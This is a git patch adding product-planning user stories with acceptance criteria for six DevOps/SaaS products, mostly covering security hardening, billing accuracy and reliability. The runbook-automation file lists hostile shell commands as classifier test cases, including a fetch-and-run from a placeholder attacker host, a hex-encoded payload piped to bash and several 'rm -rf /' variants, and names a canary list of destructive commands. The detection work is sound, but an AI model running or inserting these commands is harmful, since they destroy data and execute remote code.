From 72a0f26a7bedcfa35448d78bf8228e67379c740a Mon Sep 17 00:00:00 2001 From: Max Mayfield Date: Sun, 1 Mar 2026 02:27:55 +0000 Subject: [PATCH] Add BMad review epic addendums for all 6 products Per-product surgical additions to existing epics (not cross-cutting): - P1 route: 8pts (key redaction, SSE billing, token math, CI runner) - P2 drift: 12pts (mTLS revocation, state lock recovery, pgmq visibility, RLS leak, entropy scrubber) - P3 alert: 10pts (HMAC replay, claim-check, out-of-order correlation, free tier, tenant isolation) - P4 portal: 9pts (partial scan recovery, ownership conflicts, Meilisearch rebuild, VCR freshness, free tier) - P5 cost: 7pts (concurrent baselines, remediation RBAC, Clock interface, property tests, Redis fallback) - P6 run: 15pts (shell AST parsing, canary suite, intervention TTL, streaming audit, crypto signatures) Total: 61 story points across 30 new stories --- .../epics/epic-addendum-bmad.md | 64 +++++++++++++++ .../epics/epic-addendum-bmad.md | 77 ++++++++++++++++++ .../epics/epic-addendum-bmad.md | 76 +++++++++++++++++ .../epics/epic-addendum-bmad.md | 76 +++++++++++++++++ .../epics/epic-addendum-bmad.md | 75 +++++++++++++++++ .../epics/epic-addendum-bmad.md | 81 +++++++++++++++++++ 6 files changed, 449 insertions(+) create mode 100644 products/01-llm-cost-router/epics/epic-addendum-bmad.md create mode 100644 products/02-iac-drift-detection/epics/epic-addendum-bmad.md create mode 100644 products/03-alert-intelligence/epics/epic-addendum-bmad.md create mode 100644 products/04-lightweight-idp/epics/epic-addendum-bmad.md create mode 100644 products/05-aws-cost-anomaly/epics/epic-addendum-bmad.md create mode 100644 products/06-runbook-automation/epics/epic-addendum-bmad.md diff --git a/products/01-llm-cost-router/epics/epic-addendum-bmad.md b/products/01-llm-cost-router/epics/epic-addendum-bmad.md new file mode 100644 index 0000000..8ae3e79 --- /dev/null +++ b/products/01-llm-cost-router/epics/epic-addendum-bmad.md @@ -0,0 +1,64 @@ +# dd0c/route — Epic Addendum (BMad Review Findings) + +**Source:** BMad Code Review (March 1, 2026) +**Approach:** Surgical additions to existing epics — no new epics created. + +--- + +## Epic 1 Addendum: Proxy Engine + +### Story 1.5: API Key Redaction in Error Traces +As a security-conscious developer, I want all API keys scrubbed from panic traces, error logs, and telemetry events, so that a proxy crash never leaks customer credentials. + +**Acceptance Criteria:** +- Custom panic handler intercepts all panics and runs `redact_sensitive()` before logging. +- Regex patterns cover `sk-*`, `sk-ant-*`, `sk-proj-*`, `Bearer *` tokens. +- Telemetry events never contain raw API keys (verified by unit test scanning serialized JSON). +- Error responses to clients never echo back the Authorization header value. + +**Estimate:** 2 points + +### Story 1.6: SSE Disconnect Billing Accuracy +As an engineering manager, I want billing to reflect only the tokens actually streamed to the client, so that early disconnects don't charge for undelivered tokens. + +**Acceptance Criteria:** +- When a client disconnects mid-stream, the proxy aborts the upstream connection within 1 second. +- Usage record reflects only tokens in chunks that were successfully flushed to the client. +- Disconnect during prompt processing (before first token) records 0 completion tokens. +- Provider connection count returns to 0 after client disconnect (no leaked connections). + +**Estimate:** 3 points + +--- + +## Epic 2 Addendum: Router Brain + +### Story 2.5: Token Calculation Edge Cases +As a billing-accurate platform, I want token counting to handle Unicode, CJK, and emoji correctly per provider tokenizer, so that cost calculations match provider invoices within 1%. + +**Acceptance Criteria:** +- Uses `cl100k_base` for OpenAI models, Claude tokenizer for Anthropic models. +- Token count for emoji sequences (🌍🔥) matches provider's count within 1%. +- CJK characters tokenized correctly (each char = 1+ tokens). +- Property test: 10K random strings, our count vs mock provider count within 1% tolerance. + +**Estimate:** 2 points + +--- + +## Epic 8 Addendum: Infrastructure & DevOps + +### Story 8.7: Dedicated CI Runner for Latency Benchmarks +As a solo founder, I want proxy latency benchmarks to run on a dedicated self-hosted runner (NAS), so that P99 measurements are reproducible and not polluted by shared CI noise. + +**Acceptance Criteria:** +- GitHub Actions workflow triggers on pushes to `src/proxy/**`. +- Runs `cargo bench --bench proxy_latency` on self-hosted runner. +- Fails the build if P99 exceeds 5ms. +- Results stored in `target/criterion/` for trend tracking. + +**Estimate:** 1 point + +--- + +**Total Addendum:** 8 points across 4 stories diff --git a/products/02-iac-drift-detection/epics/epic-addendum-bmad.md b/products/02-iac-drift-detection/epics/epic-addendum-bmad.md new file mode 100644 index 0000000..db98ccc --- /dev/null +++ b/products/02-iac-drift-detection/epics/epic-addendum-bmad.md @@ -0,0 +1,77 @@ +# dd0c/drift — Epic Addendum (BMad Review Findings) + +**Source:** BMad Code Review (March 1, 2026) +**Approach:** Surgical additions to existing epics — no new epics created. + +--- + +## Epic 2 Addendum: Agent Communication + +### Story 2.7: mTLS Revocation — Instant Lockout +As a security-conscious platform operator, I want revoked agent certificates to be instantly locked out (including active connections), so that a compromised agent cannot continue sending data. + +**Acceptance Criteria:** +- CRL refresh triggers within 30 seconds of cert revocation. +- Existing mTLS connections from revoked certs are terminated (not just new connections rejected). +- New connection attempts with revoked certs return TLS handshake failure. +- Payload replay with captured nonce returns HTTP 409 Conflict. + +**Estimate:** 3 points + +--- + +## Epic 3 Addendum: Drift Analysis Engine + +### Story 3.8: Terraform State Lock Recovery on Panic +As a customer, I want the panic button to safely release Terraform state locks, so that hitting "stop" doesn't brick my infrastructure. + +**Acceptance Criteria:** +- Panic mode triggers `terraform force-unlock` if normal unlock fails. +- State lock is verified released within 10 seconds of panic signal. +- Agent logs the force-unlock attempt for audit trail. +- If both unlock methods fail, agent alerts the admin with the lock ID for manual recovery. + +**Estimate:** 3 points + +### Story 3.9: pgmq Visibility Timeout for Long Scans +As a self-hosted operator, I want long-running drift scans to extend their pgmq visibility timeout, so that a second worker doesn't pick up the same job mid-scan. + +**Acceptance Criteria:** +- Worker extends visibility by 2 minutes every 90 seconds during processing. +- No duplicate processing occurs for scans taking up to 15 minutes. +- If worker crashes without extending, job becomes visible after timeout (correct behavior). + +**Estimate:** 2 points + +--- + +## Epic 5 Addendum: Dashboard API + +### Story 5.8: RLS Connection Pool Leak Prevention +As a multi-tenant SaaS, I want PgBouncer to clear tenant context between requests, so that Tenant A's drift data never leaks to Tenant B. + +**Acceptance Criteria:** +- `SET LOCAL app.tenant_id` is cleared on connection return to pool. +- 100 concurrent tenant requests produce zero cross-tenant data leakage. +- Stress test with interleaved tenant requests on same PgBouncer connection passes. + +**Estimate:** 2 points + +--- + +## Epic 10 Addendum: Transparent Factory Compliance + +### Story 10.6: Secret Scrubber Entropy Scanning +As a security-first platform, I want the secret scrubber to detect high-entropy strings (not just regex patterns), so that Base64-encoded keys and custom tokens are caught. + +**Acceptance Criteria:** +- Shannon entropy > 3.5 bits/char on strings > 20 chars triggers redaction. +- Base64-encoded AWS keys detected and scrubbed. +- Multi-line RSA private keys detected and replaced with `[REDACTED RSA KEY]`. +- Normal log messages (low entropy) are not false-positived. + +**Estimate:** 2 points + +--- + +**Total Addendum:** 12 points across 5 stories diff --git a/products/03-alert-intelligence/epics/epic-addendum-bmad.md b/products/03-alert-intelligence/epics/epic-addendum-bmad.md new file mode 100644 index 0000000..5ba62e0 --- /dev/null +++ b/products/03-alert-intelligence/epics/epic-addendum-bmad.md @@ -0,0 +1,76 @@ +# dd0c/alert — Epic Addendum (BMad Review Findings) + +**Source:** BMad Code Review (March 1, 2026) +**Approach:** Surgical additions to existing epics — no new epics created. + +--- + +## Epic 1 Addendum: Webhook Ingestion + +### Story 1.6: HMAC Timestamp Freshness (Replay Prevention) +As a security-conscious operator, I want webhook payloads older than 5 minutes to be rejected, so that captured webhooks cannot be replayed to flood my ingestion pipeline. + +**Acceptance Criteria:** +- Datadog: Rejects `dd-webhook-timestamp` older than 300 seconds. +- PagerDuty: Rejects payloads with missing timestamp header. +- OpsGenie: Extracts timestamp from payload body and validates freshness. +- Fresh webhooks (within 5-minute window) are accepted normally. + +**Estimate:** 2 points + +### Story 1.7: SQS 256KB Claim-Check Round-Trip +As a reliable ingestion pipeline, I want large alert payloads (>256KB) to round-trip through S3 claim-check without data loss, so that high-cardinality incidents are fully preserved. + +**Acceptance Criteria:** +- Payloads > 256KB are compressed and stored in S3; SQS message contains S3 pointer. +- Correlation engine fetches from S3 and processes the full payload. +- S3 fetch timeout (10s) sends message to DLQ without crashing the engine. +- Engine health check returns 200 after S3 timeout recovery. + +**Estimate:** 3 points + +--- + +## Epic 2 Addendum: Correlation Engine + +### Story 2.6: Out-of-Order Alert Delivery +As a reliable correlation engine, I want late-arriving alerts to attach to existing incidents (not create duplicates), so that distributed monitoring delays don't fragment the incident timeline. + +**Acceptance Criteria:** +- Alert arriving after window close but within 2x window attaches to existing incident. +- Alert arriving after 3x window creates a new incident. +- Attached alerts update the incident timeline with correct original timestamp. + +**Estimate:** 2 points + +--- + +## Epic 5 Addendum: Slack Bot + +### Story 5.6: Free Tier Enforcement (10K alerts/month) +As a PLG product, I want free tier tenants limited to 10K alerts/month with 7-day retention, so that the free tier is sustainable and upgrades are incentivized. + +**Acceptance Criteria:** +- Alert at count 9,999 accepted; alert at count 10,001 returns 429 with Stripe upgrade URL. +- Counter resets on first of each month. +- Data older than 7 days purged for free tier; 90-day retention for pro tier. + +**Estimate:** 2 points + +--- + +## Epic 6 Addendum: Dashboard API + +### Story 6.7: Cross-Tenant Negative Isolation Tests +As a multi-tenant SaaS, I want explicit negative tests proving Tenant A cannot read Tenant B's data, so that confused deputy vulnerabilities are caught before launch. + +**Acceptance Criteria:** +- Tenant A query returns zero Tenant B incidents (explicit assertion, not just "works for A"). +- Cross-tenant incident access returns 404 (not 403 — don't leak existence). +- Tenant A analytics reflect only Tenant A's alert count. + +**Estimate:** 1 point + +--- + +**Total Addendum:** 10 points across 5 stories diff --git a/products/04-lightweight-idp/epics/epic-addendum-bmad.md b/products/04-lightweight-idp/epics/epic-addendum-bmad.md new file mode 100644 index 0000000..bb2f503 --- /dev/null +++ b/products/04-lightweight-idp/epics/epic-addendum-bmad.md @@ -0,0 +1,76 @@ +# dd0c/portal — Epic Addendum (BMad Review Findings) + +**Source:** BMad Code Review (March 1, 2026) +**Approach:** Surgical additions to existing epics — no new epics created. + +--- + +## Epic 1 Addendum: AWS Discovery Engine + +### Story 1.7: Partial Scan Failure Recovery +As a catalog operator, I want partial discovery scan failures (timeout, rate limit) to preserve existing catalog entries, so that a flaky AWS API call doesn't delete half my service catalog. + +**Acceptance Criteria:** +- Partial AWS scan (500 of 1000 resources) stages results without committing; all 1000 existing entries preserved. +- Partial GitHub scan (rate limited at 50 of 100) preserves all 100 ownership mappings. +- Scan failure triggers admin alert (not silent failure). + +**Estimate:** 3 points + +--- + +## Epic 2 Addendum: GitHub Discovery + +### Story 2.6: Ownership Conflict Resolution +As a catalog operator, I want explicit ownership sources (CODEOWNERS/config) to override implicit sources (AWS tags) and heuristics (commit history), so that ownership is deterministic and predictable. + +**Acceptance Criteria:** +- Priority: Explicit (CODEOWNERS/config) > Implicit (AWS tags) > Heuristic (commits). +- Concurrent discovery from two sources does not create duplicate catalog entries. +- Heuristic inference does not override an explicitly set owner. + +**Estimate:** 2 points + +--- + +## Epic 4 Addendum: Search Engine + +### Story 4.5: Meilisearch Zero-Downtime Index Rebuild +As a catalog user, I want Cmd+K search to work during index rebuilds, so that reindexing doesn't cause downtime. + +**Acceptance Criteria:** +- Search returns results during active index rebuild (swap-based rebuild). +- Rebuild failure does not corrupt the active index. +- Cmd+K prefix search from Redis cache returns in <10ms. + +**Estimate:** 2 points + +--- + +## Epic 8 Addendum: Infrastructure & DevOps + +### Story 8.7: VCR Cassette Freshness CI +As a maintainer, I want VCR cassettes re-recorded weekly against real AWS, so that API response drift is caught before it breaks integration tests. + +**Acceptance Criteria:** +- Weekly CI job (Monday 6 AM UTC) re-records cassettes with real AWS credentials. +- Creates PR if any cassettes changed (API drift detected). +- Diff summary shows which cassettes changed and by how much. + +**Estimate:** 1 point + +--- + +## Epic 9 Addendum: Onboarding & PLG + +### Story 9.6: Free Tier Enforcement (50 Services) +As a PLG product, I want free tier tenants limited to 50 services, so that the free tier is sustainable. + +**Acceptance Criteria:** +- 50th service creation succeeds; 51st returns 403 with upgrade prompt. + +**Estimate:** 1 point + +--- + +**Total Addendum:** 9 points across 5 stories diff --git a/products/05-aws-cost-anomaly/epics/epic-addendum-bmad.md b/products/05-aws-cost-anomaly/epics/epic-addendum-bmad.md new file mode 100644 index 0000000..b6d91ca --- /dev/null +++ b/products/05-aws-cost-anomaly/epics/epic-addendum-bmad.md @@ -0,0 +1,75 @@ +# dd0c/cost — Epic Addendum (BMad Review Findings) + +**Source:** BMad Code Review (March 1, 2026) +**Approach:** Surgical additions to existing epics — no new epics created. + +--- + +## Epic 2 Addendum: Anomaly Detection Engine + +### Story 2.8: Concurrent Baseline Update Conflict Resolution +As a reliable anomaly detector, I want concurrent Lambda invocations updating the same baseline to converge correctly via DynamoDB conditional writes, so that Welford running stats are never corrupted. + +**Acceptance Criteria:** +- Two simultaneous updates to the same baseline both succeed (one retries via ConditionalCheckFailed). +- Final baseline count reflects both observations. +- Retry reads fresh baseline before re-applying the update. + +**Estimate:** 2 points + +### Story 2.9: Property-Based Anomaly Scorer Validation (10K runs) +As a mathematically sound anomaly detector, I want the scorer validated with 10K property-based test runs, so that edge cases in the scoring function are caught before launch. + +**Acceptance Criteria:** +- Score is always between 0 and 100 for any valid input (10K runs, seed=42). +- Score monotonically increases as cost increases (10K runs). +- Reproducible via fixed seed. + +**Estimate:** 1 point + +--- + +## Epic 3 Addendum: Notification Service + +### Story 3.7: Remediation RBAC (Slack Action Authorization) +As a security-conscious operator, I want only account owners to trigger destructive remediation actions (Stop Instance), so that a random Slack viewer can't shut down production. + +**Acceptance Criteria:** +- Owner role can trigger "Stop Instance" (200). +- Viewer role gets 403 with "insufficient permissions". +- User from different Slack workspace gets 403. +- Non-destructive actions (snooze, mark-expected) allowed for all authenticated users. + +**Estimate:** 2 points + +--- + +## Epic 4 Addendum: Customer Onboarding + +### Story 4.7: Clock Interface for Governance Tests +As a testable governance engine, I want time-dependent logic (14-day auto-promotion) to use an injectable Clock interface, so that governance tests are deterministic and don't depend on wall-clock time. + +**Acceptance Criteria:** +- `FakeClock` can be injected into `GovernanceEngine`. +- Day 13: no promotion. Day 15 + low FP rate: promotion. Day 15 + high FP rate: no promotion. +- No `Date.now()` calls in governance logic — all via Clock interface. + +**Estimate:** 1 point + +--- + +## Epic 8 Addendum: Infrastructure & DevOps + +### Story 8.7: Redis Failure Safe Default for Panic Mode +As a resilient platform, I want panic mode checks to default to "active" (safe) when Redis is unreachable, so that a Redis outage doesn't accidentally disable safety controls. + +**Acceptance Criteria:** +- Redis disconnect → `checkPanicMode()` returns `true` (panic active). +- Warning logged: "Redis unreachable — defaulting to panic=active". +- Normal operation resumes when Redis reconnects. + +**Estimate:** 1 point + +--- + +**Total Addendum:** 7 points across 5 stories diff --git a/products/06-runbook-automation/epics/epic-addendum-bmad.md b/products/06-runbook-automation/epics/epic-addendum-bmad.md new file mode 100644 index 0000000..f9e6b32 --- /dev/null +++ b/products/06-runbook-automation/epics/epic-addendum-bmad.md @@ -0,0 +1,81 @@ +# dd0c/run — Epic Addendum (BMad Review Findings) + +**Source:** BMad Code Review (March 1, 2026) +**Approach:** Surgical additions to existing epics — no new epics created. + +--- + +## Epic 1 Addendum: Runbook Parser + +### Story 1.7: Shell AST Parsing (Not Regex) +As a safety-critical execution platform, I want command classification to use shell AST parsing (mvdan/sh), so that variable expansion attacks, eval injection, and hex-encoded payloads are caught. + +**Acceptance Criteria:** +- `X=rm; Y=-rf; $X $Y /` classified as Dangerous (variable expansion resolved). +- `eval $(echo 'rm -rf /')` classified as Dangerous. +- `printf '\x72\x6d...' | bash` classified as Dangerous (hex decode). +- `bash <(curl http://evil.com/payload.sh)` classified as Dangerous (process substitution). +- `alias ls='rm -rf /'; ls` classified as Dangerous (alias redefinition). +- Heredoc with embedded danger classified as Dangerous. +- `echo 'rm -rf / is dangerous'` classified as Safe (string literal, not command). +- `kubectl get pods -n production` classified as Safe. + +**Estimate:** 5 points + +--- + +## Epic 2 Addendum: Action Classifier + +### Story 2.7: Canary Suite CI Gate (50 Known-Destructive Commands) +As a safety-first platform, I want a canary suite of 50 known-destructive commands that must ALL be classified as Dangerous, so that classifier regressions are caught before merge. + +**Acceptance Criteria:** +- Suite contains exactly 50 commands (rm, mkfs, dd, fork bomb, chmod 777, kubectl delete, terraform destroy, DROP DATABASE, etc.). +- All 50 classified as Dangerous — any miss is a blocking CI failure. +- Suite count assertion prevents accidental removal of canary commands. +- Runs on every push and PR. + +**Estimate:** 2 points + +--- + +## Epic 3 Addendum: Execution Engine + +### Story 3.8: Intervention Deadlock TTL +As a reliable execution engine, I want manual intervention states to time out after a configurable TTL, so that a stuck execution doesn't hang forever waiting for a human who's asleep. + +**Acceptance Criteria:** +- Manual intervention state transitions to FailedClosed after TTL (default 5 minutes). +- FailedClosed triggers out-of-band critical alert with execution context. +- Human resolution before TTL transitions to Complete (no FailedClosed). + +**Estimate:** 2 points + +--- + +## Epic 5 Addendum: Audit Trail + +### Story 5.7: Streaming Append-Only Audit with Hash Chain +As a compliance-ready platform, I want audit events streamed immediately (not batched) with a cryptographic hash chain, so that tampering is detectable and events survive agent crashes. + +**Acceptance Criteria:** +- Audit event available within 100ms of command execution (no batching). +- Hash chain: tampering with any event breaks the chain (detected by `verify_chain()`). +- WAL (write-ahead log): events survive agent crash and are recoverable. + +**Estimate:** 3 points + +### Story 5.8: Cryptographic Signatures for Agent Updates +As a zero-trust platform, I want agent binary and policy updates signed with the customer's Ed25519 key, so that a compromised SaaS cannot push malicious code to customer infrastructure. + +**Acceptance Criteria:** +- Agent rejects binary update with invalid signature. +- Agent rejects policy update signed only by SaaS key (requires customer key). +- Agent accepts update with valid customer signature. +- Failed signature verification falls back to existing policy (no degradation). + +**Estimate:** 3 points + +--- + +**Total Addendum:** 15 points across 5 stories